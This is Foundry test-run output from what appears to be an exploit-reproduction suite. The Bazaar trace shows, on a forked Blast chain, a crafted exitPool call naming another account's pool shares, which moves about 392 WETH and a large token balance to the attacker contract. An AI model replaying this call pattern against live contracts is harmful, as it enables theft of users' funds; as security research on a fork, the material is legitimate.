Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.25s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2024-06/Bazaar_exp.sol:49:5:
   |
49 |     function buildExitPoolRequest() private view returns (IBalancerVault.ExitPoolRequest memory) {
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 660.37ms (4.60ms CPU time)

Ran 1 test for src/test/2024-06/Bazaar_exp.sol:Bazaar
[PASS] testExploit() (gas: 269181)
Logs:
  Attacker WETH Balance Before exploit: 0.000000000000000000
  Attacker WETH Balance After exploit: 392.368916743742801361

Traces:
  [8640] Bazaar::setUp()
    ├─ [0] VM::createSelectFork("blast", 4619716 [4.619e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [277581] Bazaar::testExploit()
    ├─ [8346] 0x4300000000000000000000000000000000000004::symbol() [staticcall]
    │   ├─ [3323] 0x83acB050AA232F97810F32aFACDE003303465ca5::symbol() [delegatecall]
    │   │   └─ ← [Return] "WETH"
    │   └─ ← [Return] "WETH"
    ├─ [9925] 0x4300000000000000000000000000000000000004::balanceOf(Bazaar: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [9405] 0x83acB050AA232F97810F32aFACDE003303465ca5::balanceOf(Bazaar: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ [811] 0x4300000000000000000000000000000000000004::decimals() [staticcall]
    │   ├─ [294] 0x83acB050AA232F97810F32aFACDE003303465ca5::decimals() [delegatecall]
    │   │   └─ ← [Return] 18
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker WETH Balance Before exploit", val: 0, decimals: 18)
    ├─ [206918] 0xefb4e3Cc438eF2854727A7Df0d0baf844484EdaB::exitPool(0xdc4a9779d6084c1ab3e815b67ed5e6780ccf4d90000200000000000000000001, 0xb66585C4E460D49154D50325CE60aDC44bc900E9, Bazaar: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], ExitPoolRequest({ asset: [0x4300000000000000000000000000000000000004, 0x86cba7808127d76deaC14ec26eF6000Aa78b2eBb], minAmountsOut: [0, 0], userData: 0x0000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000002bf1a8054a46d0092000000, toInternalBalance: false }))
    │   ├─ [52195] 0xdC4A9779D6084C1ab3e815B67eD5e6780cCF4d90::onExitPool(0xdc4a9779d6084c1ab3e815b67ed5e6780ccf4d90000200000000000000000001, 0xb66585C4E460D49154D50325CE60aDC44bc900E9, Bazaar: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], [392891898170893798600 [3.928e20], 881713335901352162952662931 [8.817e26]], 0, 0, 0x0000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000002bf1a8054a46d0092000000)
    │   │   ├─ emit Transfer(from: 0xb66585C4E460D49154D50325CE60aDC44bc900E9, to: 0x0000000000000000000000000000000000000000, value: 850000000000000000000000000 [8.5e26])
    │   │   ├─  storage changes:
    │   │   │   @ 2: 0x000000000000000000000000000000000000000002c00a69a6fe437238269582 → 0x00000000000000000000000000000000000000000000efe95259d671a6269582
    │   │   │   @ 0xed0a015eeeb606ca5fc649c6f8e8e22867a1ffded705839eee986b5832af072e: 0x000000000000000000000000000000000000000002c00a69a6fe437238175342 → 0x00000000000000000000000000000000000000000000efe95259d671a6175342
    │   │   │   @ 9: 0x000000000000000000000000000000000000000001600534d37f21b91c134ac1 → 0x000000000000000000000000000000000000000000001c63ec977802d14ef7de
    │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000001545366aeb379bc5d1000000000000000000000000000000000000000002d85d87ba5426d0a0ec3c95000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [79248] 0x4300000000000000000000000000000000000004::transfer(Bazaar: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 392368916743742801361 [3.923e20])
    │   │   ├─ [78725] 0x83acB050AA232F97810F32aFACDE003303465ca5::transfer(Bazaar: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 392368916743742801361 [3.923e20]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0xefb4e3Cc438eF2854727A7Df0d0baf844484EdaB, to: Bazaar: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 392368916743742801361 [3.923e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xa959e9edef8dfec9c97bd1e84094e99e98266c1348abd44d3f3c8613876d6a11: 0x0000000000000000000000000000000000000000000000000000005aa693534c → 0x0000000000000000000000000000000000000000000000000000000020a602a7
    │   │   │   │   @ 0xf6ee19a79c7e3beee4e4dabebcae08a18f53811f1bfcfff620dce0351d2d3fec: 0 → 0x0000000000000000000000000000000000000000000000000000005a85ed50a5
    │   │   │   │   @ 0xcec6dc01206cb73693ee8ca88cf17a85af9a623d3db7555bb20456a9a64ad926: 0 → 0x0000000000000000000000000000000000000000000000000000000010056900
    │   │   │   │   @ 0x86f9cca636cf436aa8ff0ad5514dd111900aa00f461df881feb1f2fb7a50c281: 0x000000000000000000000000000000000000000000000000000000001642418a → 0x00000000000000000000000000000000000000000000000000000000063cd88a
    │   │   │   │   @ 0xf3dad4d6d5dcb45d586b5d9e516147ce14f86aa65cb1e856b41873f998dd9cba: 0x0000000000000000000000000000000000000000000000154c786caa59b71cc8 → 0x000000000000000000000000000000000000000000000000074201bf221b56f7
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [34582] 0x86cba7808127d76deaC14ec26eF6000Aa78b2eBb::transfer(Bazaar: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 880539680499205933573618837 [8.805e26])
    │   │   ├─ emit Transfer(from: 0xefb4e3Cc438eF2854727A7Df0d0baf844484EdaB, to: Bazaar: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 880539680499205933573618837 [8.805e26])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000002d85d87ba5426d0a0ec3c95
    │   │   │   @ 0x7ba8d98bb7e07d521e01b2a07fa1842b6f109bec4e350fcd90264cdbd84f9b59: 0x000000000000000000000000000000000000000002d9560fb6f58dfc6acecf93 → 0x00000000000000000000000000000000000000000000f887fca1672bc9e292fe
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 2: 0x000000000000000000000000000000000000000002c00a69a6fe437238269582 → 0x00000000000000000000000000000000000000000000efe95259d671a6269582
    │   │   @ 0xc3a36e45ae5542edad3eef34d956d41b56303a6febf10dadcc7a216400e013e8: 0x0000000000000000000000000000000000000000000000154c786bc185120cc8 → 0x000000000000000000000000000000000000000000000000074200d64d7646f7
    │   │   @ 0xc7356f4d0d95dc449a2745ffc7213cf4759db2c9cb9b7ec5a22a0e263a6174fe: 0x000000000000000000000000000000000000000002d9560fb6f58dfc6acecf93 → 0x00000000000000000000000000000000000000000000f887fca1672bc9e292fe
    │   └─ ← [Stop]
    ├─ [1925] 0x4300000000000000000000000000000000000004::balanceOf(Bazaar: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [1405] 0x83acB050AA232F97810F32aFACDE003303465ca5::balanceOf(Bazaar: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 392368916743742801361 [3.923e20]
    │   └─ ← [Return] 392368916743742801361 [3.923e20]
    ├─ [0] VM::assertEq(392368916743742801361 [3.923e20], 392368916743742801361 [3.923e20], "Did not get expected ETH") [staticcall]
    │   └─ ← [Return]
    ├─ [1846] 0x4300000000000000000000000000000000000004::symbol() [staticcall]
    │   ├─ [1323] 0x83acB050AA232F97810F32aFACDE003303465ca5::symbol() [delegatecall]
    │   │   └─ ← [Return] "WETH"
    │   └─ ← [Return] "WETH"
    ├─ [1925] 0x4300000000000000000000000000000000000004::balanceOf(Bazaar: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [1405] 0x83acB050AA232F97810F32aFACDE003303465ca5::balanceOf(Bazaar: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 392368916743742801361 [3.923e20]
    │   └─ ← [Return] 392368916743742801361 [3.923e20]
    ├─ [811] 0x4300000000000000000000000000000000000004::decimals() [staticcall]
    │   ├─ [294] 0x83acB050AA232F97810F32aFACDE003303465ca5::decimals() [delegatecall]
    │   │   └─ ← [Return] 18
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker WETH Balance After exploit", val: 392368916743742801361 [3.923e20], decimals: 18)
    ├─  storage changes:
    │   @ 0: 2 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 6.41s (5.24s CPU time)

Ran 2 test suites in 7.30s (7.07s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
